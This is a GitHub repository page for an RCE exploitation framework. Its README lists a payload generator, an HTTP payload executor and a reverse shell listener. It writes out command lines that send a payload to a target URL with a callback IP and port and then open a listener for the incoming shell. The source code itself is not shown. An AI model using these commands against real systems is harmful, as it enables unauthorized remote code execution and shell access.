Skip to content

This framework is designed to assist penetration testers or developers in understanding the mechanics of remote code execution (RCE) exploitation.

Notifications You must be signed in to change notification settings

Jenderal92/RCE-Exploit-Framework

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 

Repository files navigation

RCE-Exploit-Framework

This framework is designed to assist penetration testers or developers in understanding the mechanics of remote code execution (RCE) exploitation.

RCE-Exploit-Framework Jenderal92

Features

  • Payload Generator: Supports the creation of custom payloads based on Python, Bash, and PHP.
  • Exploit Executor: Delivers the payload to the target via HTTP POST or GET.
  • Reverse Shell Listener: A module to receive reverse shell connections.
  • Log Output: Saves logs of exploitation activities for further analysis.

How to Use

  1. Download and install Python from the official Python website: https://www.python.org.
  2. Install Module pip pip install requests
  3. Display Help:
  4. python rce_framework.py -h
    
  5. Send Payload to Target:
  6. python rce_framework.py -t http://site.com/vuln -p python -i 127.0.0.1 --port 4444
    
  7. Run Listener for Reverse Shell:
  8. python rce_framework.py -l 4444
    
  9. Follow the instructions displayed in the terminal.

Disclaimer !!!

I have written the disclaimer on the cover of Jenderal92. You can check it HERE !!!

About

This framework is designed to assist penetration testers or developers in understanding the mechanics of remote code execution (RCE) exploitation.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages